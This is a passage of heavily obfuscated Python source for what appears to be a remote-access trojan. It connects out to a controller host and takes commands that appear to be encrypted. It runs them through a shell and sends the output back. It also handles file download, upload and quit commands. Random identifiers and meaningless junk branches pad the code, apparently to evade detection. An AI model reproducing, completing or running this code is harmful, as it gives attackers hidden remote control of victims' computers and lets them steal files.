'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG',
'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU',
'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ',
'SztutxvJpQPSSAtDNrxDfTwWvHESskJxAhJBIeFJOCODlGoQFxPADJRzUMwmDyr'
]
for ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw in zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn:
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT:
if wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk == QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw
elif QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr == CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
else:
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus:
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG
except Exception:
pass
def rAFBSHNfNqQlRskEEOBCJCBrinBnGFJIUAEGRrJSOzbMDFRJPuteotGtOqQIFRF():
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE = socket.socket()
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.connect((CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC, fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ))
OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG = vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE)
while True:
try:
qszarrPSmABYwIuQUDZqyzuGivmJHGtmvQIQxtJTUHTJIInZwhVvhvGGFsHByAH = 'CPQIjOXUpICRzvDomHPpCuIwGmmBpaejPCNqktxIHJIucQSImDUDDzosxNBFByp'
XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE = 'HsIsIOIrYCFwxSDEUKIImTBfxBOzRoCqIDsOLrIPEBmQRZHhSyIuEBsvBBYSEJz'
nDDCjXJSNjCSAwnPSIrSGPSsvBFSxDJAoLfzVtXyDcqwyFetOBoyFGyyOHRWDQB = 'PxQHAsApjsDMMxIFFGSFPSmyuaovEvQRzEDWQSSJExqvSAtHnyGQMAxISYPRSCo'
YQwEumOQzUvSBJRBMrquASQzvgMlyRwJqqGQSDQEHBQBCRhnPFFLBkAGwFPzHrE = 'DHuNRsuVQBRvSfQmlWxIHPiDJEJUHzNvJeJSRHRjWHonQDCGvyxUyEBxBqDDBCh'
PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh = 'ZFSKpRQjqSRQsIwndMBuGmJDXqIJwwQOMAPMlMXrwyzZBynDCDiJDvYsGEkgItE'
mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG = 'xSImhuEgIImqBqQruzNFQFiimJDmNSCoJDGyvgEHAolDzBSJiIiNmFxHSuzJDDk'
ysywJIQQxvRBHSJzRMpytrHFtWNmoJMNpsFSGOJCpGQkzFGiiPBJdwIWBRPSxCh = [
'CPQIjOXUpICRzvDomHPpCuIwGmmBpaejPCNqktxIHJIucQSImDUDDzosxNBFByp',
'PxQHAsApjsDMMxIFFGSFPSmyuaovEvQRzEDWQSSJExqvSAtHnyGQMAxISYPRSCo',
'ZFSKpRQjqSRQsIwndMBuGmJDXqIJwwQOMAPMlMXrwyzZBynDCDiJDvYsGEkgItE',
'FxzJRvGHoBetyDPZmyqTxPzvyJOPIwHwROCIZQFqjyPGtyQpHzAIzvISJIvewAc'
]
for qszarrPSmABYwIuQUDZqyzuGivmJHGtmvQIQxtJTUHTJIInZwhVvhvGGFsHByAH in mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG:
for XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE in nDDCjXJSNjCSAwnPSIrSGPSsvBFSxDJAoLfzVtXyDcqwyFetOBoyFGyyOHRWDQB:
if YQwEumOQzUvSBJRBMrquASQzvgMlyRwJqqGQSDQEHBQBCRhnPFFLBkAGwFPzHrE == PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh:
XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE = qszarrPSmABYwIuQUDZqyzuGivmJHGtmvQIQxtJTUHTJIInZwhVvhvGGFsHByAH
elif PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh == XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE:
XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE = mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG
else:
PEkPSrRBHWYNFPJJfUqDlfCQthJDASzBJQFOgyqPfJZOxsBUHsFSzCIDRWZDxQh = mJprrHHNxPGrIBAoBPGGvqBqSbMiBBvIBUtIQuHAmsNFuCHvstRByYuWCDpIIzG
for XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE in ysywJIQQxvRBHSJzRMpytrHFtWNmoJMNpsFSGOJCpGQkzFGiiPBJdwIWBRPSxCh:
nDDCjXJSNjCSAwnPSIrSGPSsvBFSxDJAoLfzVtXyDcqwyFetOBoyFGyyOHRWDQB = XBovmnHqHENBxJYxuBABEFCwrEADvZGIHAQCEDCpGzHJSNGhizpqCSxFcuUIFE
except Exception:
pass
utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz = IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.recv(1024)
utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz = uSIByGHznHHkkvwwPIVnIDFmmvPIHMRIyINSxzREPRIJQsuHBAIBMOtBQvIltFA(utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG)
qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy, _, action = utxASYTPwYNCHHtvzCyOEEqIFExAZCQvzPPcuWuRRcTEqexyjSyJkmRzCAQcESz.partition(' ')
if qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'quit':
lzHSySNCJQnQJHQBIAHPzMuFSFRIHEBxIGrBfSIEJozxOzIWnrmRMosNHwvIrnq = 'cEtFSRCQPIQIOAwxwBzZjqxjJmFSBwyZXOIqNvQRLGCGlCsCRGHHtHCDXJNCzTG'
DJVLDDOyGRyzIyFOPIuByCnHnmDISMDDxJtpzoBmBzYxEuNbIoIylWkRDBlBNgJ = 'UzJZQsEGCBqEiOJzjQJmgAoHGGRIiRSAWIIyHzuoWFsICwJGUtxJrBytsBMFREH'
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'vOBImXNklEptLxJgyIBFKLtFKqvGyEEDkLxCQXASUSsETJGDIyuExGQgHCcwofE'
if lzHSySNCJQnQJHQBIAHPzMuFSFRIHEBxIGrBfSIEJozxOzIWnrmRMosNHwvIrnq == DJVLDDOyGRyzIyFOPIuByCnHnmDISMDDxJtpzoBmBzYxEuNbIoIylWkRDBlBNgJ:
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'vOBImXNklEptLxJgyIBFKLtFKqvGyEEDkLxCQXASUSsETJGDIyuExGQgHCcwofE'
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = lzHSySNCJQnQJHQBIAHPzMuFSFRIHEBxIGrBfSIEJozxOzIWnrmRMosNHwvIrnq
else:
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'vOBImXNklEptLxJgyIBFKLtFKqvGyEEDkLxCQXASUSsETJGDIyuExGQgHCcwofE'
BoHREzOAuQMNpnNOqIANpozNDwsHSCzsQCzyCOeFDvFCRNztJuDEASRSAsFnvyz = 'cEtFSRCQPIQIOAwxwBzZjqxjJmFSBwyZXOIqNvQRLGCGlCsCRGHHtHCDXJNCzTG'
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.close()
sys.exit(0)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'run':
gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG = 'oHWGBxHIFOEmRQpBvxrPRrYuZDwPcNADyiWvAYmQfBRnQoyXoAyDRGorhjHCJBg'
SCqHrMGJEQFERBQNNEtoyuGrCBFGlJxQQmnQGuUFUCRwiGEOHSUSwOlLRMgHvtw = 'vvztLwHGCSSEmEMDRqIPFHONIvDITSZSJoEyPFxEyEmDDRDwryluQCPxCGwjFjX'
if gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG != SCqHrMGJEQFERBQNNEtoyuGrCBFGlJxQQmnQGuUFUCRwiGEOHSUSwOlLRMgHvtw:
gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG = 'vvztLwHGCSSEmEMDRqIPFHONIvDITSZSJoEyPFxEyEmDDRDwryluQCPxCGwjFjX'
SCqHrMGJEQFERBQNNEtoyuGrCBFGlJxQQmnQGuUFUCRwiGEOHSUSwOlLRMgHvtw = gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG
gVNGNypRryCCyTzESJzrQCqqQQBGJRqSRWDZSqDxHuGHIPQCvGSzwHIEIxSAsBG = 'oHWGBxHIFOEmRQpBvxrPRrYuZDwPcNADyiWvAYmQfBRnQoyXoAyDRGorhjHCJBg'
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz.stdout.read() + RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz.stderr.read()
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.sendall(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'download':
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = 'SuGMSGSoukMArRFzOIURIvASABDEQQQvxvGEPBFyGCVSHSHDDHIpRDFpSvWQCEF'
HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx = 'xyqpQHznyFWQQBBxgSvDIRJeANBRWhOttInNmQuIuIHGIIEnArQiFzORAXwElrn'
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'uQPOxvxQOzGvXyztpnuPtxiBVGyBprBomGsSzQFJzeyEHDrzzHAGOPyByJzJDSH'
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = 'mxmEFtzHPPqHRxOOySRIFDjERQMCXwRBvjrqHVQSqAytIJmHChFVEAJFfzIymGs'
if HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx == vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ:
for vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ in HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
if HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx == HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE'
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE:
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE:
for pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE in HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
if QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE == HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE'
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE:
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx
for pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE in HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
if QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE == HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx:
pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE = 'QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE'
elif pxDOIJOEABDESCsytsRAhRHxJEfWwMOIwuzzfFCSEQMDOuYvwRsnFAIxwyrtzEE == QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE:
QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE = vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = QjvQDXPuCmrrQIIVADMCBBJEPmCEjNzTrvhEHQDnQNORMyxFpgNDhNDvFSyvPvE
else:
vxRESNbozESZrFNBwDSsfPFAiJNVwzCADwTyBIytvVEUuCSfEeLEAICsQDsqFzJ = HzCExPEEGFsUyApREYBRwDJQFzvGwxHIyySDvkxxpDplZkypmjFWiAJmSIOFFFx
for HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ in action.split():
InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG = 'wuSkQpBFwBZtJDFotMOoWxWFGSyxSoHsMSAOujuOGtqqPZSSEDYISPNCOpuJHDC'
IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ = 'XGpQSHPIQQwNHJmvuyEJZCoRSNrUIyHEIkDyvxvJJhzrAIGtLHBAutASzIOJADv'
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = 'RYDlWDuDIIvssuSFkivGGTzSqkoIzuFGwiXBvzFMILWHRMEOnHOMJFuqFPBBbSH'
rJRDFRHDuJBIAzAxIPrpUUwtIyQuvPPewuRivyGOEsGLqAmyGSQUgCFubInyvrn = 'roXptSSltRKyLyHouySIRnEFmzwuzQSFFuzvDEugDVESzwZBlDSNekCRmoBDrsv'
EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO = 'RHSyCrCezQqbDpuIFNJEUBwkxzOuImujSOQVnOJANENQiBKoJyArcRIuGNoHCWq'
NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt = 'hxzPsyvPnJpznvGBOHcXzvCRwAWMyCCfQqQRAEIyYfmLyCuHDVRtqfvDqBxCYXC'
if InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG != rJRDFRHDuJBIAzAxIPrpUUwtIyQuvPPewuRivyGOEsGLqAmyGSQUgCFubInyvrn:
IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ = xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx
for NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt in rJRDFRHDuJBIAzAxIPrpUUwtIyQuvPPewuRivyGOEsGLqAmyGSQUgCFubInyvrn:
if NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt != xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx:
IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ = IBywwnSWCIIzSHHESODCpOxxxuPBvGrBQvDkuWwTjQqvmoEQYvAoluCqLiZDotJ
else:
EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO = InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG
else:
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG
InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG = EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO
if xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx == InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG:
for NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt in InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG:
if NSfIHSfEzDwpHXDyQAOzFISPQkFHEczRxoECNxpSGHbJIGuBXEAtHJRmOyBPCyt == xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx:
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = InjExZKpzSEvAGTkLoZHJzuNsQxDSQCqFyFCrGrsPQDqAPHBAAROEyBSGsEIaOG
else:
xFrIiQASzSNxYIOuyovRHxzzppSrJSuwBTsJzNjtJGvHRvSfNItmIOputHLyNqx = EFWAqnGCpFDHSlHHHuXjJAESOFRZDumSyDQpHJPDbQpzRLIDSUBInmlrJiIyJGO
HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ = HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ.strip()
kyvylzQylABvsJoPANuHBJzJofEFAOEIIiJpCEDRxoQNolMqHtFCHxSyBSrFSCC(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE, HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'upload':
sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA = 'iGRkxJSAGLKFwDyDnFxPQHvUYPADOrOUnusPSGfAzBxCGVyAukvxSuhPSCzJRUC'
QJzSDIJezitDcGPIlXkryQRvGshPCNGoAtspzhwEORtFIDiFBQROECJEFGTXc = 'IGAPFSGIIGQqtGFBBuPDGSANLDYHZpvSPJXERMLTDiCORlCJCFCOCoASAJwrwYB'
if sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA != QJzSDIJezitDcGPIlXkryQRvGshPCNGoAtspzhwEORtFIDiFBQROECJEFGTXc:
sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA = 'IGAPFSGIIGQqtGFBBuPDGSANLDYHZpvSPJXERMLTDiCORlCJCFCOCoASAJwrwYB'
QJzSDIJezitDcGPIlXkryQRvGshPCNGoAtspzhwEORtFIDiFBQROECJEFGTXc = sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA
sRFQSjfuxYMvEmxlCXPwyRPzrGIwQAQSNArRSFzNHGYEQsdSlOGtAzRbqyJxliA = 'iGRkxJSAGLKFwDyDnFxPQHvUYPADOrOUnusPSGfAzBxCGVyAukvxSuhPSCzJRUC'
for HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ in action.split():
LAFSpsoxCuWxCiyQDmIDzAFPHCyARxmBRYbJooSpFkPDDRhJExPuJprsQQJIYP = 'zLFSVYSvsJRyyXQkkFFBOJtHIuYYyzYYFswCHHpZTHkzrGJqGEJOFzYDOfWFfx'
HCtOsxzZIIyWZJvgqJzsmuECpvBvtxAPQaijvRAFwwypzFFBcGSBRPsIBHLqHHU = 'rMhzIYCQAJIPSPEyPpGDHHqfCCFESOwhxmvwrSJCTGQHSuqIPmtuzHLRrJIExC'
yxWEhWRuFqHsEsztFXSEgXFJcJyznQvnmnihbsREEQJySzDuWMBSyxQtOwFwGFD = 'HqWvoJJyLsyQPuBDkrnLGJYDSUoRSHANCQpyjsJDOUAtkImiHMrHlPAHCrRIHmj'
GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh = 'MIsTPKREJAzzCJyWHHOxQnFzIBsxyFWrvICpIuJuRSdsGCgHGCGqHkvJwttLUFv'
yxOzAHJAPtGPpSQyERJHwySSDAwxIuIOCOwxFJHDkJBCkDsPGHYHRCvPIxQyxGN = 'jooAHpwPyCEIGOvOdIJODUltyEAzxAHxGwvBRyGCHVGHsnEIuGOYjEJGMyIyHDS'
vmIyCvEIrXuzkwVhyDVMwOGNSZVJndPBiqqLuzAskMPCyBISxtTyrgHrRYIMCHn = 'IBBQAErwozkmBJEjzQdCuzQUkXPJVrntymwPkGGCrBImJxHrUHCnzAGReDxpyzo'
if yxWEhWRuFqHsEsztFXSEgXFJcJyznQvnmnihbsREEQJySzDuWMBSyxQtOwFwGFD == GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh:
for vmIyCvEIrXuzkwVhyDVMwOGNSZVJndPBiqqLuzAskMPCyBISxtTyrgHrRYIMCHn in yxOzAHJAPtGPpSQyERJHwySSDAwxIuIOCOwxFJHDkJBCkDsPGHYHRCvPIxQyxGN:
if vmIyCvEIrXuzkwVhyDVMwOGNSZVJndPBiqqLuzAskMPCyBISxtTyrgHrRYIMCHn == GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh:
